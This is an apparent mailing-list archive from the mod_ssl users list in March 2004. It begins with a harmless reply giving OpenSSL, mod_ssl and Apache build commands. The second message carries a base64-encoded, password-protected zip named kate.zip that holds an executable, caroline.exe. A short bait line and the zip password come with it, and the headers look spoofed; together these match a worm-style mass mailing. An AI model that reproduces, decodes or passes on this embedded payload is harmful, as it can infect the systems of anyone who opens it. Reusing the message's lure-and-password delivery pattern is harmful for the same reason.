	by boggle.pobox.com (Postfix) with ESMTP
	for ; Mon,  1 Mar 2004 12:18:50 -0500 (EST)
Received: from yourpa86z1i3g7 (unknown [65.73.239.18])
	by jester.pobox.com (Postfix) with ESMTP id 89EAE84
	for ; Mon,  1 Mar 2004 12:18:49 -0500 (EST)
From: "Dave Paris" 
To: 
Subject: RE: Install Questions
Date: Mon, 1 Mar 2004 12:18:56 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <008301c3ffae$637c78c0$6501a8c0@bob>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

First and foremost, if this is a world-accessable server, upgrade your
version of OpenSSL to the most recent available for RH7.3 (I'd also consider
upgrading to RH9.0 while you're at it).  0.9.6b has several security
vulnerabilities outlined at www.openssl.org.  Also, use the most current
versions of Apache and mod_ssl.

.. that being said..

Generally speaking, the standard, non-DSO build can be summarized as such:

# build and install OpenSSL from source (http://www.openssl.org)
cd ${OPEN_SSL_SRC_DIR} ; CFLAGS=${CFLAGS} ./config -fPIC
make test
make install

# build mod_ssl/patch Apache source (http://www.modssl.org)
cd ${MOD_SSL_DIR}
CFLAGS=${CFLAGS} ./configure --with-apache=../${APACHE_SRC_DIR}

# build and install Apache from source (http://httpd.apache.org)
cd ${APACHE_SRC_DIR}
CFLAGS=${CFLAGS} SSL_BASE=../${OPEN_SSL_SRC_DIR}
./configure --enable-module=ssl
make
make install

# done..
There are numerous other configuration directives, but the above will build
a mod_ssl capable Apache instance for you.

Kind Regards,
-dsp

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Bob Cohen
> Sent: Monday, March 01, 2004 11:58 AM
> To: modssl-users@modssl.org
> Subject: Install Questions
>
>
> Hi,
>
> Please forgive the newbie questions, I'm a web designer bumbling my way
> through system administration.  I really did make an effort to search
> the archives. :-)  Time's running short to get this project done.
>
> The box on which I'm working has RedHat 7.3 with openssl-0.9.6b-35.7
> installed as an RPM.
[...]


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 18:46:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D3FCCA8A4F; Mon,  1 Mar 2004 18:46:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tupaps (ACBA5F20.ipt.aol.com [172.186.95.32])
	by master.modssl.org (Postfix) with SMTP id F32A8A8A4B
	for ; Mon,  1 Mar 2004 18:45:46 +0100 (CET)
Date: Wed, 01 Mar 2000 18:46:07 +0100
To: modssl-users@modssl.org
Subject: kate
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------iwomydnnncvdexwvwxwn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------iwomydnnncvdexwvwxwn
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Love the outdoors, literature, writing, and athletics
pass: 84435

----------iwomydnnncvdexwvwxwn
Content-Type: application/octet-stream; name="kate.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="kate.zip"

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
